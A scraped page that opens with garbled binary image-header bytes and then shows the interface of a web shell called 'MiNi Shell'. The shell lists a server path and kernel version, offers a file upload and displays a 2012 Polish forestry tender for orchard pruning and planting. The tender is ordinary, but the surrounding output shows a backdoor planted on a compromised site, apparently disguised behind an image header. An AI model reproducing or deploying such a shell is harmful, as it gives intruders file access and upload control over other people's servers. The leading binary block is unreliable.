JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/71260-N-2012.html

<p class="kh_header"><b>Bircza: Usługi z zakresu gospodarki łąkowo-rolnej w Nadleśnictwie Bircza w 2012r. - prace w zakresie pielęgnacji i sadzenia sadów owocowych</b><br>
<b>Numer ogłoszenia: 71260 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bircza , Stara Bircza 99, 37-740 Bircza, woj. podkarpackie, tel. 016 6725004, 6755343, faks 016 6725004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi z zakresu gospodarki łąkowo-rolnej w Nadleśnictwie Bircza w 2012r. - prace w zakresie pielęgnacji i sadzenia sadów owocowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi pielęgnacyjne i sadzenie drzewek owocowych w istniejących starych sadach owocowych znajdujących się na gruntach administrowanych przez Nadleśnictwo Bircza. 
2. Zakres prac obejmuje 
2.1 Cięcia prześwietlające drzew owocowych polegające na:  przerzedzeniu nadmiernie przegęszczonych partii koron w tym także wilków (tj. pędów silnie rosnących), usunięciu suchych i złamanych gałęzi, konarów. Prace obejmują zabezpieczenie miejsca cięcia środkiem grzybobójczym (wraz z zakupem środka), uporządkowanie powierzchni tj. wywiezienie na wskazane miejsca usuniętych konarów i gałęzi (odległość wywozu i składowania odpadów do 200 m.) oraz dojazd do miejsca wykonywania prac. Łączna ilość sztuk drzew do cięć prześwietlających 1815. 
2.2 Dosadzenie drzewek owocowych w istniejących nasadzeniach tj.: wykonanie placówek o wym. 1m x 1m, podsypanie nawozem, przekopanie gleby na placówkach, wykonanie dołka łopatą, posadzenie drzewek. Prace obejmują dojazd do miejsca wykonywania prac oraz transport materiałów (sadzonki do odebrania w szkółce Kotów, nawóz z magazynu Nadleśnictwa w Starej Birczy).Łączna ilość sztuk drzew do sadzenia 180. 
2.3  Sadzenie drzewek owocowych tj.: wykonanie placówek o wym. 1m x 1m, podsypanie nawozem, przekopanie gleby na placówkach, wykonanie dołka łopatą, posadzenie drzewek. Prace obejmują dojazd do miejsca wykonywania prac oraz transport materiałów (sadzonki do odebrania w szkółce Kotów, nawóz z magazynu Nadleśnictwa w Starej Birczy).
Łączna ilość sztuk drzew do sadzenia 480.
2.4 Pielęgnowanie drzewek owocowych (nowozakładanych i istniejących nasadzeń w wieku do 5 lat) poprzez niszczenie chwastów między sadzonkami w ogrodzeniu wraz z dojazdem do miejsca wykonania prac. Łączna ilość sztuk drzewek do pielęgnacji 840..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 Ustawy, polegających na powtórzeniu usług (zwiększeniu rozmiaru świadczonych usług) będących przedmiotem niniejszego zamówienia i stanowiących do 50% wartości zamówienia podstawowego w okresie trzech lat od udzielenia zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.21.16.00-8, 77.21.15.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia zasobów w zakresie wiedzy i doświadczenia do wykonania zamówienia - Wykonawcy którzy wykażą i udokumentują wykonanie (lub przedstawią zobowiązanie innego podmiotu do udostępnienia wiedzy i doświadczenia wraz z jego udokumentowaniem) w okresie ostatnich 3 lat, a w przypadku, gdy okres działalności jest krótszy to w tym okresie, usług o podobnym charakterze i zakresie, jakie obejmuje zamówienie (obejmujących prace związane z zakładaniem, pielęgnacją sadów, sadzeniem lub pielęgnacją drzew) potwierdzone: referencjami, protokołami odbioru robót, opiniami, listami polecającymi stwierdzającymi, że usługi te  zostały wykonane lub są wykonywane należycie. Zamawiający uzna, iż powyższy warunek jest spełniony, jeśli Wykonawca udokumentuje wykonanie usług o wartości nie mniejszej niż 20 000,00 złotych brutto (dwadzieścia tysięcy złotych). Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. III.4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnieniu warunku w zakresie dysponowania potencjałem technicznym niezbędnym do wykonania zamówienia. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnieniu warunkuw zakresie dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnieniu warunku w zakresie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać ponadto następujące dokumenty i oświadczenia. 
a) Pełnomocnictwo do złożenia oferty o ile nie wynika z innych dokumentów dołączonych do oferty, a także pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), jeśli dotyczy
b) Wypełniony formularz ofertowy, wzór stanowi załącznik nr 1 do SIWZ; 
c) Wykaz prac, które Wykonawca zamierza zlecić do wykonania podwykonawcom zgodny w treści z wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Zamawiający dopuszcza możliwość dokonywania istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany takie mogą być wprowadzone za zgodą obu stron i pod rygorem nieważności wymagają formy pisemnej za wyjątkiem przypadków określonych poniżej.
1. Warunki istotnych zmian umowy w stosunku do treści oferty. 
1.1 Zmiana terminów wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, uzasadniona może być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy tj.: 
- wystąpienia siły wyższej, której wystąpienie ma wpływ na realizację umowy lub wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy. Termin  siła wyższa oznacza zdarzenia katastrofalne (powódź, pożar, trzęsienie ziemi) i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec, 
- czasowego wstrzymania prac przez Zamawiającego, wynikającego z obiektywnych i uzasadnionych przyczyn.
W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość przedłużenia terminu zakończenia umowy. Przedłużenie terminu realizacji prac nastąpi w formie aneksu do umowy i wymaga pisemnego wniosku Wykonawcy wraz z uzasadnieniem, zaakceptowanego przez Zamawiającego. Przedłużenie terminu zakończenia prac nastąpi o okres wymagany do zakończenia realizacji umowy (uwzględniający także czas występowania niekorzystnych czynników uniemożliwiających realizację przedmiotu zamówienia). 
1.2 Zmiana zakresu przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany (w tym skutkami finansowymi), przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy: 
- zaistnienia warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy, które skutkują niemożliwością jej kontynuacji i są niezależne od stron, 
- zmniejszenia przez Zamawiającego ilości drzew owocowych do pielęgnacji lub do sadzenia wynikające z przyczyn niezależnych od stron (np., uschnięcia lub uszkodzenia drzew przeznaczonych do pielęgnacji, braku dostatecznej ilości sadzonek, zmiany warunków przyrodniczych uzasadniających wykonanie danej usługi). 
W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość zmiany zakresu przedmiotu umowy. Zmiana taka nastąpi w formie aneksu do umowy i spowoduje zmianę wynagrodzenia umownego.
1.3 Zmiana wynagrodzenia umownego, w zakresie wynikającym z: 
- zmian zakresu przedmiotu umowy określonego w punkcie 1.2 
W przypadku zmniejszenia ilości drzew do pielęgnacji lub ilości sadzonek do sadzenia przez Zamawiającego, z wynagrodzenia Wykonawcy zostanie potrącona odpowiednia kwota obliczona w oparciu o zaoferowane ceny jednostkowe i zredukowany zakres prac. 
- zmiany obowiązującej stawki podatku VAT 
W przypadku zmiany w trakcie realizacji umowy obowiązującej stawki podatku od towarów i usług (VAT) nastąpi zmiana wynagrodzenia umownego proporcjonalnie do zmiany obowiązujących stawek. W takim przypadku wartość wynagrodzenia z tytułu realizacji niniejszej umowy obliczona będzie jako iloczyn stawek jednostkowych netto podanych w ofercie za wykonanie poszczególnych prac i ich rozmiaru (wartość umowy netto pozostanie niezmienna) powiększona o podatek od towarów i usług, obliczony według stanu na dzień powstania obowiązku podatkowego. Zmiany takie nie wymagają aneksu do umowy. 
1.4 Zmiana lokalizacji wykonania przedmiotu umowy, spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy i polegać może na zmianie podanej lokalizacji drzew przewidzianych do pielęgnacji lub do sadzenia, ilości drzew w podanych lokalizacjach. Zmiana taka nastąpi w formie aneksu do umowy i nie może powodować zmiany wynagrodzenia umownego. (stawki jednostkowe określone w ofercie pozostaną niezmienne).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Bircza adres: Stara Bircza 99, 37-740 Bircza...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 12:00, miejsce: Nadleśnictwo Bircza adres: Stara Bircza 99, 37-740 Bircza pokój 211 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków UE 
2. Warunki wykonywania i finansowania zadania: 
Realizacja przedmiotu zamówienia będzie następowała sukcesywnie. Szczegółowa lokalizacja i terminy wykonania prac w poszczególnych lokalizacjach (w tym także okazanie w terenie drzew do pielęgnacji oraz miejsc do sadzenia drzewek owocowych wyszczególnionych w Specyfikacji Istotnych Warunków Zamówienia), określone zostaną w zleceniach prac do wykonania sporządzonych przez osoby upoważnione przez Zamawiającego. Termin wykonania prac określony w zleceniu nie może wykraczać poza okres określony w umowie (koniec realizacji umowy). Odbiór ilościowo - jakościowy wykonanych prac będzie dokonywany przez osoby upoważnione i dokumentowany będzie na druku protokołu odbioru prac. Protokół odbioru prac jest podstawą do wystawienia faktury za wykonaną przez Wykonawcę usługę. Należność za usługę, obliczona na podstawie rozmiaru wykonanych prac i stawek jednostkowych określonych w ofercie, będzie płatna przelewem na konto Wykonawcy w terminie do 30 dni od daty otrzymania faktury. Zakłada się rozliczanie na podstawie faktur częściowych po zrealizowaniu wystawionych zleceń.
3. Terminy realizacji zamówienia:
3.1	Rozpoczęcie: po wystawieniu zlecenia: pierwsze zlecenia zostaną wystawione w terminie do 7 dni od daty podpisania umowy
3.2	Część zamówienia nr 1: Wykonanie cięć  prześwietlających drzew owocowych rozpoczęcie: po wystawieniu zlecenia: prace w leśnictwach: Krzywe, Trójca, Wojtkówka, Jamna, Jureczkowa  i Arłamów (łączna ilość drzew do prześwietlenia 860 szt.)   należy wykonać w miesiącu marcu i kwietniu. Prace w pozostałych leśnictwach (łączna ilość drzew do prześwietlenia 955 szt.)   należy wykonać w miesiącu październiku i listopadzie.
3.3	Część zamówienia nr 2: Zakładanie i uzupełnianie sadów  owocowych oraz pielęgnacja nasadzeń; sadzenie i dosadzanie drzewek należy wykonać do 30.04.2012r, pielęgnację drzewek owocowych należy wykonać w miesiącu czerwcu i lipcu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie cięć  prześwietlających drzew owocowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cięcia prześwietlające drzew owocowych polegające na:  przerzedzeniu nadmiernie przegęszczonych partii koron w tym także wilków (tj. pędów silnie rosnących), usunięciu suchych i złamanych gałęzi, konarów. Prace obejmują zabezpieczenie miejsca cięcia środkiem grzybobójczym (wraz z zakupem środka), uporządkowanie powierzchni tj. wywiezienie na wskazane miejsca usuniętych konarów i gałęzi (odległość wywozu i składowania odpadów do 200 m.) oraz dojazd do miejsca wykonywania prac. Łączna ilość sztuk drzew do cięć prześwietlających 1815..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakładanie i uzupełnianie sadów  owocowych oraz pielęgnacja nasadzeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Dosadzenie drzewek owocowych w istniejących nasadzeniach tj.: wykonanie placówek o wym. 1m x 1m, podsypanie nawozem, przekopanie gleby na placówkach, wykonanie dołka łopatą, posadzenie drzewek. Prace obejmują dojazd do miejsca wykonywania prac oraz transport materiałów (sadzonki do odebrania w szkółce Kotów, nawóz z magazynu Nadleśnictwa w Starej Birczy).Łączna ilość sztuk drzew do sadzenia 180. 
2.  Sadzenie drzewek owocowych tj.: wykonanie placówek o wym. 1m x 1m, podsypanie nawozem, przekopanie gleby na placówkach, wykonanie dołka łopatą, posadzenie drzewek. Prace obejmują dojazd do miejsca wykonywania prac oraz transport materiałów (sadzonki do odebrania w szkółce Kotów, nawóz z magazynu Nadleśnictwa w Starej Birczy).
Łączna ilość sztuk drzew do sadzenia 480.
3. Pielęgnowanie drzewek owocowych (nowozakładanych i istniejących nasadzeń w wieku do 5 lat) poprzez niszczenie chwastów między sadzonkami w ogrodzeniu wraz z dojazdem do miejsca wykonania prac. Łączna ilość sztuk drzewek do pielęgnacji 840..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.21.15.00-7, 77.21.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com